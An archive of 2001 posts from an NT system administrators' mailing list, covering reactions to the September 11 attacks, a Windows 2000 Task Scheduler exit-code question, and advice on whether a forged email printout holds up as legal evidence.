Yea - I saw this yesterday after seeing the info on him in the news. Interesting, they had posted the info and his obit was located directly adjacent to a free trip to somewhere - big icon of a plane. Now it's changed. Somebody finally realized it was tacky. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Rick Iiams [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 7:28 PM To: NT System Admin Issues Subject: Re: WTC attack apparently SlashDot is accurate http://www.akamai.com/ At 12:06 PM 9/11/01 -0700, you wrote: I'm watching MSNBC and the live shots still show a lot of smoke coming up from the area. Looks like a very large fire there now. Can any of you NYC people see it? There were also shots of the Brooklyn bridge (I think - never been there) full of people walking out of the city.One of my buddies in NJ said he could see an aircraft carrier in the river and jet fighters flying over his house. Slashdot reports that one of the founders of Akamai may have been on one of the planes that hit the wtc. Later - DR http://www.sunbelt-software.com/ntsysadmin_list_charter.htm -Rick Iiams- Office Systems Administrator Midway Games West The difference between genius and stupidity is that genius has its limits. - Albert Einstein http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack At least with Pearl Harbor, you knew who it was. Terrorists are cowards. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Allen Crawford [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:50 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Pearl Harbor is more like it... -Original Message- From: Richard McClary [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:28 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack No, I can't think of anything that touches this event for US! This is in the order of Tokyo, Hiroshima, Nagasaki, Dresden... At 11:19 AM 9/11/2001 -0400, you wrote: This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Win 2000 Task Scheduler - Error Code explanation
Try running the batch from the scheduler and watch what it does. You'll find either it's a rights or a default directory issue. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Mohamed A. Karimullah [mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 12:12 PM To: NT System Admin Issues Subject: Win 2000 Task Scheduler - Error Code explanation A batch program when run manually or scheduled to run in a minute or two (for testing) runs successfully. When scheduled for after hours with no activity for about 6 hours or so, the Task Scheduler log file reports ...The task completed with an exit code of (1). An exit code of (0) refers to a successful task. What does exit code (1) signify? As I'm at it what does exit code (2331) imply? Where among the plethora of literature did MS put an explanation of these exit codes? The Task Scheduler runs on a Win 2000 Adv server in an NT 4 Domain. The Batch job is a simple copy and unzipping operation. Thanks. Mohamed A Karimullah Network Engineer PATRINA CORPORATION 2 Wall Street, New York, NY 10005 T -(212) 233-1155 F -(212) 233-2244 [EMAIL PROTECTED] www.patrina.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: RE: Legal Email Issues - Dont shoot me :) -
Salami mail - is that a type of spam mail? Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Thomas W. Shinder [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 05, 2001 12:36 PM To: NT System Admin Issues Subject: RE: RE: Legal Email Issues - Dont shoot me :) - Hi Benjamin, The phonied up email is worthless as evidence unless the mail headers can be presented as evidence. The header information would then need to be confirmed with the ISP logs. Of course, if it goes to jury rather than judge, she could present a salami with a message on it and claim you sent it as email. HTH, Tom www.isaserver.org/shinder Thomas W Shinder, M.D., MCSE, MCT -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 05, 2001 11:25 AM To: NT System Admin Issues Subject: OT: RE: Legal Email Issues - Dont shoot me :) - aint divorce a b*tch? lol..been there done that, got the t-shirt. crying in front of the judge ALWAYS works! Your only defenseFACTS! Getting caught telling lies in court is the worst. If you can prove she is not being truthful, negotiations will be yours! Spite is a nasty beast. email off line for any other related horror stories...heh best of luck to you. Jeff -Original Message- From: Benjamin Zachary [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 05, 2001 9:05 AM To: NT System Admin Issues Subject: OT: Legal Email Issues - Dont shoot me :) - This is kind of a personal issue, but maybe someone could help me out as it relates to legalaties for email. My x-wife typed stuff up in word to look like an email and put threats and various obscenties in it. There is no header info just says subject,to,from and the offending text it could simply be typed in word (and was btw!:) ). Anyhow, I went online to mail.com, yahoo.com, hotmail.com, outlook, outlook express, and aol.com and printed up an email from each to show that this isnt what an email looks like. I also printed the header info from both outlook and outlook express to show server transactions. My lawyer is bringing in 'an email expert' to certify the email doesnt show anything. Any ideas.. would be grateful Although this is pertaining to my personal problem, it may be interesting to know what the law is viewing as a valid email vs. fraudlent email. I read up on some cases online but most dealt with spammers and not holding an email for an assault or contract negotation. Thx to any who have some ideas! http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
